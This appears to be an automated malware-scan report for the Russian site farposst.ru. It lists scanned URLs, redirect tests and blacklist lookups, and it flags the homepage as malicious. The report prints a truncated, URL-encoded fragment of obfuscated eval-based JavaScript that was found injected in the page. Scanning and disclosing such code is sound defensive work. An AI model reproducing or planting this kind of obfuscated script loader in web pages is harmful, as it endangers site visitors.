Scanned pages/files
Request | Server response | Status |
http://farposst.ru/ | 200 OK Content-Length: 65634 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) x="%3Cscript%20type%3D%22text%2FJavaScript%22%20language%3D%22JavaScript%22%20charset%3D%22windows-1251%22%3Eeval%28function%28i%2Ca%2Cc%2Ck%2Ce%2Cd%29%7Be%3Dfunction%28c%29%7Breturn%20c.toString%2836%29%7D%3Bif%28%21%27%27.replace%28%2F%5E%2F%2CString%29%29%7Bwhile%28c--%29%7Bd%5Bc.toString%28a%29%5D%3Dk%5Bc%5D%7C%7Cc.toString%28a%29%7Dk%3D%5Bfunction%28e%29%7Breturn%20d%5Be%5D%7D%5D%3Be%3Dfunction%28%29%7Breturn%27%5C%5Cw%2B%27%7D%3Bc%3D1%7D%3Bwhile%28c--%29%7Bif%28k%5Bc%5D%29%7Bi%3Di.replace% Antivirus reports:
| ||
http://userapi.com/js/api/openapi.js?20 | 200 OK Content-Length: 63942 Content-Type: application/x-javascript | clean |
http://stg.odnoklassniki.ru/share/odkl_share.js | 200 OK Content-Length: 12312 Content-Type: application/x-javascript | clean |
http://counter.rambler.ru/top100.jcn?1589395 | 200 OK Content-Length: 6853 Content-Type: application/x-javascript | clean |
http://farposst.ru/phpBB2/recent.php | 200 OK Content-Length: 1275 Content-Type: text/html | clean |
http://farposst.ru/test404page.js | 404 Not Found Content-Length: 289 Content-Type: text/html | clean |
http://farposst.ru//translate.google.com/translate_a/element.js?cb=googleTranslateElementInit/ | 404 Not Found Content-Length: 318 Content-Type: text/html | clean |
http://www.farposst.ru/engine/ajax/dle_ajax.js | 200 OK Content-Length: 7921 Content-Type: text/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: farposst.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Wed, 16 Apr 2014 03:04:05 GMT
Pragma: no-cache
Server: Apache/2.2.26 (CentOS)
Content-Type: text/html; charset=CP1251
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=qohn3av7ksnb7utskd1espt662; path=/
X-Powered-By: PHP/5.3.3
GET / HTTP/1.1
Host: farposst.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Wed, 16 Apr 2014 03:04:05 GMT
Pragma: no-cache
Server: Apache/2.2.26 (CentOS)
Content-Type: text/html; charset=CP1251
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=qohn3av7ksnb7utskd1espt662; path=/
X-Powered-By: PHP/5.3.3
Second query (visit from search engine):
GET / HTTP/1.1
Host: farposst.ru
Referer: http://www.google.com/search?q=farposst.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: farposst.ru
Referer: http://www.google.com/search?q=farposst.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=farposst.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://farposst.ru/
Result: farposst.ru is not infected or malware details are not published yet.
Result: farposst.ru is not infected or malware details are not published yet.